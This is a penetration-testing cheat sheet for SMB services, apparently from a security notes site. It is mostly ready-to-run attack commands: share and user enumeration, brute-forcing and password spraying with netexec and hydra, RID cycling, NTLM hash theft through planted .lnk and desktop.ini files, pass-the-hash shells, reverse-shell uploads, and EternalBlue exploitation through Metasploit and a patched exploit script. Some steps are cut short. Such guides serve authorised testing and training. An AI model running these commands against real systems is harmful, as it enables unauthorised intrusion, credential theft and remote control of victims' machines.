SMB (Server Message Block) Pentesting
It allows clients, like workstations, to communicate with a server like a share directory. Samba is derived from SMB for linux. Default ports are 139, 445.
Enumeration
To enumerate automatically, we can use various tools such as nmap, smbclient, and so on
nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>
# NetBIOS names
nmblookup -A 10.0.0.1
nbtscan 10.0.0.1
nbtscan -r 10.0.0.1/24
# Enum4linux
enum4linux <target-ip>
# All enumeration
enum4linux -a <target-ip>
# Verbose
enum4linux -v <target-ip>
# Specify username and password
enum4linux -u username -p password <target-ip>
# Enum4linux-ng
# -A: All simple enumeration including nmblookup
enum4linux-ng -A <target-ip>
# -As: All simple short enumeration without NetBIOS names lookup
enum4linux-ng -As <target-ip>
# -u: Specific username
# -p: Specific password
enum4linux-ng -u "administrator" -p "password" <target-ip>
# NetExec (https://www.netexec.wiki/)
netexec smb 10.0.0.0/24
netexec smb <target-ip>
netexec smb <target-ip-1> <target-ip-2>
netexec smb <target-ip> -u username -p password
netexec smb <target-ip> -u username -p password --users
# -M zerologon: Scan for ZeroLogon
# -M petitpotam: Scan for PetitPotam
netexec smb <target-ip> -u '' -p '' -M zerologon -M petitpotam
# -M petitpotam: Scan for PetitPotam
Find Shared Folders
# -N: No password
# -L: List shared directories
smbclient -N -L <target-ip>
smbclient -L <target-ip> -U username
smbmap -H <target-ip>
# Recursive
smbmap -H <target-ip> -R
# Username and password
smbmap -u username -p password -H <target-ip>
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
netexec smb <target-ip> -u '' -p '' --shares
netexec smb <target-ip> -u username -p password --shares
impacket-psexec example.local/username@<target-ip>
Brute Force Credentials
netexec smb <target-ip> -u username -p passwords.txt --continue-on-success
netexec smb <target-ip> -u usernames.txt -H ntlm_hashes.txt --continue-on-success
hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb
# RID Brute Force
netexec smb <target-ip> -u username -p password --rid-brute 20000
# Using Metasploit
msfconsole
msf> use auxiliary/scanner/smb/smb_login
If we find credentials, we can use them for smbclient or WinRM.
If we got "STATUS_PASSWORD_MUST_CHANGE" for some users, we can update a current password to a new one.
smbpasswd -r <target-ip> -U <username>
# or
impacket-smbpasswd <DOMAIN>/<username>:<password>@<target-ip> -newpass <new-password>
# If you don't have impacket-smbpasswd, download it from a repository.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/smbpasswd.py
RID Cycling Attack
RID enumeration.
It attempts to enumerate user accounts through null sessions.
# Anonymous logon
# 20000: Maximum RID to be cycled
impacket-lookupsid example.local/anonymous@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000
# Specify user
impacket-lookupsid example.local/user@<target-ip> 20000 -hashes <lmhash>:<nthash>
impacket-lookupsid example.local/user@<target-ip> 20000
# USEFUL COMMAND
# This command extract usernames. It's useful for further enumeration which uses usernames.
# Replace the following keywords:
# - `example.com` => Target domain
# - `10.0.0.1` => Target IP
# - `DOMAIN` => Target domain name
impacket-lookupsid example.com/guest@10.0.0.1 20000 -no-pass > tmp.txt | cat tmp.txt | grep SidTypeUser | cut -d ' ' -f 2 | sed 's/DOMAIN\\//g' | sort -u > users.txt && rm tmp.txt
Password Spraying Attack
If we have a user password, we might be able to find another user with the same password.
# User enumeration
netexec smb <target-ip> -u John -p Password123 --users
netexec smb <target-ip> -u John -H <NTLM_HASH> --users
# Find users with same password
netexec smb <target-ip> -u users.txt -p Password123 --continue-on-success
netexec smb <target-ip> -u users.txt -p found_passwords.txt --continue-on-success
netexec smb <target-ip> -u users.txt -H <NTLM_HASH> --continue-on-success
netexec smb <target-ip> -u users.txt -H found_ntlm_hashes.txt --continue-on-success
NTLM Stealing
Using ntlm_theft
# -g all: Generate all files.
# -s: Local IP (attacker IP)
# -f: Folder to store generated files.
python3 ntlm_theft -g all -s <local-ip> -f samples
After generating files with ntlm_theft , put the .lnk file (samples.lnk here) to the shared folder.
Now start Responder to retrieve the stolen NTLM hashes. Run the following command in our local machine:
Connect
You can use smbclient to connect the target.
# anonymous login
smbclient //10.0.0.1/somedir -N
# If the folder name contains spaces, surround with double quotes
smbclient "//10.0.0.1/some dir" -N
# Specify user
smbclient //10.0.0.1/somedir -U username
# nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody
# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
To get a Windows shell, run the following examples.
impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1
Commands in SMB
After connecting, we can investigate the shared folder to find sensitive files or information.
List Folders/Files
Download Folders/Files
smb> get sample.txt
# If the filename contains spaces, it need to be enclosed in double-quotes.
smb> get "Example File.txt"
To download files recursively, run the following commands.
Or using smbget from local machine.
Especially, it’s useful for downloading a large file rather than “get” command in smbclient.
smbget smb://<target-ip>/somedir/example.txt -U username
smbget -R smb://<target-ip>/somedir -U username
# Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
# as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous
Upload Files
- Upload Reverse Shell Payload
If the website is associated with the SMB server, we can upload reverse shell script such as aspx, php and get a shell.
To create a payload, please refer to the Web Reverse Shell or the Reverse Shell with Metasploit.
Then upload it to the SMB server as below.
Don’t forget to start a listener for getting outcoming connection.
Now access to https://example.com/path/to/smb/share/shell.aspx.
We can get a shell.
Steal NTLM Hash with Desktop.ini
Reference: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini
We can retrieve the hashes by putting desktop.ini file, that contains arbitrary icon resource path, to the shared folder.
Create a new desktop.ini in local machine.
Then upload it to the writable shared folder.
Start responder in local machine.
After a while, we can retrieve the NTLM hashes.
EternalBlue (MS17-010)
msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
# If you cannot get a shell with the default payloed (windows/x64/meterpreter/reverse_tcp), try to change the payload
msf> set payload payload/generic/shell_reverse_tcp
AutoBlue
AutoBlue is an automatic exploit.
Download the repository and run the following example command.
Manual Exploiting
You need to have two files - exploit.py, mysmb.py
-
Download mysmb.py
-
Edit Some Lines of mysmb.py for Python3
You need to edit some code because this exploit is old so only supports Python2.
Line.69 # transData = b'' transData = '' Line.73 # transData = ('\x00' * padLen) + str(parameters) transData = "".join(map(chr,(b'\x00' * padLen))) + str(parameters) Line.80 # transData += ('\x00' * padLen) + data transData += "".join(map(chr,(b'\x00' * padLen))) + str(data) Line.231 # req = str(pkt) req = pkt.getData() return b'\x00'*2 + pack('>H', len(req)) + req # assume length is <6553 Line.381 # data += resp['Data'][1:] data += resp['Data'][1:].decode() -
Download exploit.py
-
Edit the Credentials in exploit.py
-
Run the script